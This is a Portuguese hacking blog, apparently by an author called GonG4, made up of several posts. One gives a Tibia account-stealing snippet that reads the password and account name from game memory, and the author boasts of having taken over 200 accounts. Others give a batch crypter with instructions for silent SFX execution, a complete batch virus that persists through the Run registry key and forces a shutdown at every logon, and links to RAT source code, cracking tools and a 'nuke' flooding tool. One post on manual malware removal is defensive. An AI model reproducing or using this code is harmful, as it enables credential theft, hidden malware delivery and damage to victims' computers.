Tibia Stealer

Quem gosta de jogar Tibia?

Atualmente (03/12/2009, dd/mm/yyyy), o Tibia é um jogo muito popular no Brasil e em outras partes da Europa, sendo jogado por mais de 40.000 (quarenta mil) jogadores ao mesmo tempo.

Na sua versão atual (8.53), é fácil roubar a senha com um vírus, não precisa de um keylogger, mas de um stealer, um aplicativo que lê a string dentro do processo do jogo!

Endereços (memory addr): 792A24 (senha) e 792A44 (acc).

char value1[51];
char value2[51];
ReadProcessMemory(pphandle,(LPVOID)0x00792A24,&value1,50,NULL); // Pega
senha
ReadProcessMemory(pphandle,(LPVOID)0x00792A44,&value2,50,NULL); // Pega acc

~~

Agora é só fazer um sisteminha de envio de email e concatenação de string (value1 + value2), além da verificação das string's se elas forem NULL.

~~

Já peguei mais de 200 contas em 20 dias com esse tipo de programinha.

Edit 08/03/10 ~~

As instruções já estão sendo detectadas, para deixar indetectável, tente usar esse método: http://hepteam.blogspot.com/2010/01/resouvi-escrever-essa-postagem-porque.html

GonG4

AutoRuns / Install Watch / TrialReset

Desculpe por deixar o blog parado, estou sem muito tempo para atualiza-lo, as coisas irão mudar desse dia em diante.

--

Trouxe 3 aplicações importantes para um cracker que tenta descobrir as chaves e os valores que um programa escreve no registro.

AutoRuns (Microsoft SysInternals): Um software que, além de ajudar a retirar virús e outras coisas, serve para verificar se algum software instalou alguma dll ou algum executavel no sistema de inicialização do windows.

http://download.sysinternals.com/Files/Autoruns.zip





InstallWatch (http://www.epsilonsquared.com/): Verifica entradas de registro e arquivos que alguns softwares de instalação como o install shield deixam no seu computador.

http://www.epsilonsquared.com/anonymous/InstallWatchPro25.exe


TrialReset: Programa muito utilizado, especial para crackers. Analiza as entradas de registros que determinados softwares de proteção contra engenharia reversa criam. Funciona com diversos, como o Armadillo.

http://letitbit.net/download/f9a602709469/Trial-Reset-34Final.rar.html

WinRAR Crypter + BAT

Blz galera!!

Tive uma idéia de fazer um script BAT que cria um RAR encripitado com senha e outro BAT que vai abri-lo e executar o arquivo de dentro:

@echo off
set path=%systemroot%;%systemroot%\system32;%cd%;%systemroot%\system;%homedrive%;%homedrive%\arquivos de programas;%homedrive%\arquivos de programas\winrar
color 02
set cfgng=%cd%
set owner=GonG4
title WinRAR Crypter
cls
echo WinRAR Crypter by %owner% :::::::::
:comeco
echo.
echo Nome do arquivo a ser Encripitado (caso nao esteja na mesma pasta especifique o diretorio):
set /p arq1=
if not exist %arq1% ( goto comeco )
:cont
echo.
echo Nome do arquivo a ser executado depois da extracao (sem diretorio):
set /p arq3=
echo.
echo Senha:
set /p senha=
echo.
echo Arquivo de saida:
set /p arq2=
echo.
echo Criando RAR com senha...
rar a -p%senha% %arq2%.rar %arq1%
echo.
echo RAR com senha criado.
echo.

echo Criando Script...
echo.
echo @echo off > %arq2%.bat
echo color 00 >> %arq2%.bat
echo cls >> %arq2%.bat
echo set path=%systemroot%;%systemroot%\system32;%cd%;%systemroot%\system;%homedrive%;%homedrive%\arquivos de programas;%homedrive%\arquivos de programas\winrar >> %arq2%.bat
echo unrar e -kb -o+ -p%senha% %arq2%.rar *.* >> %arq2%.bat
echo %arq3% >> %arq2%.bat
echo exit >> %arq2%.bat
echo Script criado.

echo.
echo Arquivos %arq2%.bat e %arq2%.rar criados. Dica: Utilize eles em um self-extract com execucao automatica do arquivo .BAT.

pause
exit

Quando você usar ele, coloque o Nome do arquivo a ser encripitado, o nome do arquivo a ser executado, a senha e o nome dos arquivos de saída. Ex.:

C:\server.exe
server.exe
123(Senha)
gong4(ArquivoDeSaida)

Agora crie um SFX ou use um binder e coloque os arquivos gong4.bat e gong4.rar, coloque auto-execução no gong4.bat.

http://hepteam.blogspot.com/2009/03/transformando-qualquer-arquivo-em-um.html

~~

GonG4

;D

Transformando qualquer arquivo em um EXE (SFX)

A propósito é bem simples, você pode usar um binder ou um joiner, mas nós vamos usar o WinRAR.

Um SFX é um auto extrator, ou seja, um executavel que extrai automaticamente os arquivos.

Fazendo um .EXE que extrai e executa um arquivo de modo invisível:

Selecione os arquivos que você quer compactar e aperte com o botão direito em um deles (com todos selecionados). No menu, clique em "Add to archive..." ou "Adicionar para arquivo...".

Na tela do WinRAR selecione a opção "Create SFX file" ou "Criar arquivo SFX". Na aba superior, clique em "Advanced" ou "Avançado" e depois clique no botão "SFX Options..." ou "Opções SFX...".

A seguir em "Path to extract" (pasta para extrair), selecione a opção "Create in current folder" (criar na própria pasta). Em "Setup program" (configurações do programa), no campo de texto "Run after extraction" (iniciar após extração) coloque o nome do programa ou arquivo que você deseja iniciar após a extração. Na aba "Advanced", existem opções que não são muito importantes. Na aba "Modes" (modos), selecione a opção "Unpack to temporaly folder" (descompactar para pasta temporaria) e "Hide all" (ocultar tudo). Na aba "Update", selecione "Extract and replace files" (extrair e substituir arquivos) e "Overwrite all files" (sobreescrever todos os arquivos). Clique em "OK" e "OK" novamente.

Depois da compressão você tem o executavel dentro da pasta dos arquivos ou a que você configurou.

GonG4

;D

Batch Script (badcom) part1

"Quem gosta de programar scripts batch?"

Opa! A pergunta correta é:

Quem não gosta de programar scripts batch?

Eles são chamados de badcom's, mas não são realmente badcom's (.COM Mal). Badcom's são programas compilados, geralmente feitos em assembly com a extenção .COM, ou seja, não são scripts (linhas de comando).

O que realmente quero mostrar a vocês, leitores, é como programar um script batch (extenção .BAT) de modo "proficional" (não somente comandos simples como copy e del..., mas comandos de condições, executaveis, DLL's, etc).

~~ Vamos começar...

Inicie o CMD (prompt de comando)

Como todo programados sabe, é necessário o uso de variáveis para a funcionalidade de um bom programa, não um simples como copy x, del x...
No Windows existe variaveis ambiente, são aquelas que já estão gravadas nele, para vê-las é só usar o comando SET, uma das principais é a variável path, nela fica os caminhos onde o computador, caso um arquivo não exista na pasta atual, analiza e procura pelos mesmos. As variáveis estão sempre entre %.
Caso queira informações de algum comando use Comando /?.

Começando a programar:

Inicie o notepad (bloco de notas)

- Siga o tutorial e digite os comandos que estão nas caixas.

rem Cabeçalho do arquivo.

Rem é usado para gravar comentários, eles não irão interferir em nada na execução do script.

@echo off

Em um batch script esse comando é importante, pois com ele o usuario não pode ver de onde o arquivo está sendo executado.

set path=%systemroot%;%systemroot%\system32;%cd%

Os %% indicam que a palavra é uma variável (systemroot) ou retorno de um comando (CD, pega pasta do atual), caso você use somente a palavra ele vai entender como simples letras.

Usando esse comando você vai acelerar seu script. O verdadeiro valor da variável path vai ser, no meu caso: C:\windows;C:\windows\system32;X:\pasta do arquivo

color 02

Use a cor que você preferir. No meu caso usei 02 (verde escuro). Para mais informações: color /?.

set cfgng=%cd%

Grava a pasta atual em uma variável.

title GNG Betray

Adiciona um título à tela do CMD. No caso "GNG Betray" (sem aspas).

cls

Limpa a tela do CMD.

echo ::::: GNG Betray Virus :::::

Fala determinada letra, palavra ou frase. No caso acima: "GNG Betray Virus" (recomendo não usar acentos).

set user=%username%
set userpath=%homepath%\
set desktop=%homepath%\desktop
set windows=%windir%\
set drive=%systemdrive%\

Determina algumas variáveis p/ uso mais facilitado do script.

set batchname=arquivo.bat

Em vez de arquivo.bat, você coloca o nome do seu arquivo.

cd %desktop%

Vai para o desktop do usuário, todas as ações abaixo desse comando vão ser executadas nele caso você não mude o destino ou vá para outra pasta.

echo.
echo %cfgng%\%batchname%
echo Creating virus log file...
echo Blz %user%!! > GNGBetray.txt
echo Estou aqui para foder com seu PC!! >> GNGBetray.txt
echo By GonG4 >> GNGBetray.txt
echo Log file created.

Echo. = pulo de linha.
Segundo, terceiro e último echo's imprimem frases no cmd.
Os outros escrevem um arquivo chamado GNGBetray.txt com o texto:

Blz
Estou aqui para foder com seu PC!!
By GonG4

> = Cria um arquivo e escreve a primeira linha.
>> = Escreve nova linha no arquivo.

echo.
echo Copiando arquivos p/ kernel...
cd \
copy %cfgng%\%batchname% %windows%\system32\%batchname%

cd \ = Volta para o drive. No meu caso: C:\.
Copy = Copia determinado arquivo para determinada pasta.

echo.
echo Infectando registro...
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\run /v Killer123 /t REG_SZ /d %windows%\system32\%batchname%
echo Registro infectado.

Reg = Edição de registro.

msg * Error in OS, please restart computer!
echo.
RunDll32.exe USER.EXE,ExitWindowsExec

Msg = Mostra mensagem. * é usado para mostrar as mensagens p/ todos os usuários.
Rundll32 executa funções de executaveis e de DLL's, mas só algumas!!

Código completo do virús:

rem Cabeçalho do arquivo.
@echo off
set path=%systemroot%;%systemroot%\system32;%cd%
color 02
set cfgng=%cd%
title GNG Betray
cls
rem Começo dos códigos.
echo ::::: GNG Betray Virus :::::
set user=%username%
set userpath=%homepath%\
set desktop=%homepath%\desktop
set windows=%windir%\
set drive=%systemdrive%\
set batchname=btrybat.bat
cd %desktop%
echo.
echo %cfgng%\%batchname%
echo Creating virus log file...
echo Blz %user%!! > GNGBetray.txt
echo Estou aqui para foder com seu PC!! >> GNGBetray.txt
echo By GonG4 >> GNGBetray.txt
echo Log file created.
echo.
echo Copiando arquivos p/ kernel...
cd \
copy %cfgng%\%batchname% %windows%\system32\%batchname%
echo.
echo Infectando registro...
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\run /v Killer123 /t REG_SZ /d %windows%\system32\%batchname%
echo Registro infectado.
msg * Error in OS, please restart computer!
echo.
RunDll32.exe USER.EXE,ExitWindowsExec

Esse simples virús deve ser salvo em .BAT.
NÃO ESQUEÇA DE MUDAR A VARIÁVEL DO NOME DO ARQUIVO .BAT!!

Cuidado para não executar!!

Funções:

Desliga Windows toda hora que usúario loga no computador.

~~

Espero que tenha gostado.

GonG4

;D

Retirando virús manualmente (Windows)

O Windows é um sistema operacional que usa o registro para guardar informações, uma pequena parte desse registro é usada para executar o malware na inicialização do sistema, então necessitamos de uma pequena ajuda...

Programas:

Regedit (disponível com o Windows)
HijackThis (Download)
ComboFix (Download)

Você também pode usar um ótimo taskmanager: Process Explorer (2009/03/programas-p-monitoramento-de-processos.html) da SysInternals.

Inicie o RegEdit pelo executar ou pelo CMD escrevendo "regedit.exe" (sem aspas) e apertando ENTER. Vá nessa chave de registro:

HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>
CurrentVersion>RUN

Caso apareça algum programa estranho nas entradas que você não conheça de uma procurada no Google, se o programa for muito usado ele está com todas as informações em alguns sites. Se o programa provavelmente for um virús muito conhecido ele vai estar em alguns sites de AV ou outros lugares de remoção manual dos mesmos. Se o programa não for conhecido e tiver poucas ou nenhuma informações provavelmente é um virús desconhecido.

Para se livrar da praga apenas delete a entrada que estiver com ela e depois vá no diretório dela, faça o backup do arquivo (virús/programa) em outro lugar e delete o original. Não esqueça de finalizar o processo do malware!!

Existem outras entradas no registro que tem a mesma finalidade, mas a utilizada no tutorial é a mais "famosa" (usada).

Programa como HijackThis e ComboFix ajudam muito o usuario a resolver esses problemas, no youtube e/ou google videos há vários tutoriais (vídeo-aulas) de como usar as tais ferramentas.

Um ótimo site de remoção de malwares p/ a segurança do seu PC: http://www.linhadefensiva.org/

O site/forum LinhaDefensiva possue vários softwares de ajuda p/ remoção manual/altomatica de pragas virtuais, e além disso no forum você pode pedir ajuda p/ pessoas que entendem do assunto.

GonG4

;D

RAT Source Codes

Bem vindo,

Fiz um pacote com sources (códigos fontes) de trojans, a maioria, praticamente tudo, é feito em VB.

Senha: hepteam.blogspot.com

Download: Megaupload

Use o programa WinRAR p/ descompactar, quando ele pedir a senha coloque ela, que está nessa postagem e no arquivo RAR.

Caso queira o Delphi 7 e/ou o VB6 p/ abrir os códigos fontes, acesse essa página do blog: http://hepteam.blogspot.com/2009/02/vb6-e-portable-delphi-7-download.html

Bom proveito e obrigado por visitar meu blog.

;D

Programas p/ monitoramento de processos

Todos os programas são da SysInternals

Process Monitor

Monitora o processo a procura de API's de edição do registro, arquivos, entre outros.

Download: http://download.sysinternals.com/Files/ProcessMonitor.zip



FileMon

Monitoramento de arquivos (edição e leitura).

Download: http://download.sysinternals.com/Files/Filemon.zip



RegMon

Monitoramento de edição/leitura de registro, ótimo p/ aquelas aplicações trial (shareware) que colocam informações no registro, assim é só retira-los.

Download: http://download.sysinternals.com/Files/Regmon.zip



Process Explorer

Um taskmanager poderoso, é mais seguro do que o do windows, possue várias opções de visualização de processo, entre outros.

Download: http://download.sysinternals.com/Files/ProcessExplorer.zip


~~

Espero que goste dos softwares, são uma grande utilizade p/ programadores/crackers.

GonG4

;D

VB6 e Portable Delphi 7 (Download)

P. Delphi 7: http://rapidshare.com/files/101735085/PortableDelphi7.rar

~~

VB6: http://rapidshare.com/files/90483419/V_B_6.rar

IP Info/Utility (projeto inicial p/ testes e estudos)

Bom dia,

Já que este é o meu primeiro post no blog e o primeiro do blog, gostaria de já estar agradecendo aqueles que estão lendo e à nossa equipe.

Terminei hoje o meu primeiro programa que interage com a internet, até agora tinha feito programas que eram relacionados ao cracking, jogos, matemática (contas), api’s (Windows) e banco de dados, hoje resolvi mudar um pouco. Aqui vai uma screenshot:

Nome: IP Utility
Autor: GonG4
Site: hepteam.blogspot.com
Linguagem: VB

Caracteristicas:

- Retorna o IP (caso tenha colocado um host) e o nome da maquina.
- Pinga e pega a média de tempo de resposta e retorna o Status (0 = sucesso).
- Nuke, que envia dados gigantescos p/ uma porta de determinado IP com o objetivo de derruba-lo. Para computadores pessoais use a porta 8080.
- Enviar buffer, que envia determinado texto p/ uma determinada porta, esse texto pode servir como comando p/ um trojano, basta saber os comandos e saber como usar.
- Trace que usa o tracert.exe, só fiz esse para fazer testes.
- Localização que abre um endereço com o Google maps e a localização do determinado ip conectado.

Espero que tenha gostado, como eu disse, é a minha primeira aplicação que se conecta com a internet, e também é uma das poucas que eu fiz que usam desenhos e visuais que não sei fazer muito bem também.


Programa (74 kb packet, 144 kb unpacket):

http://www.megaupload.com/?d=Y2KA69FG

Código fonte (VB6):

http://www.megaupload.com/?d=50K39PJA

Próximo projeto vai ser um trojano.

GonG4

;D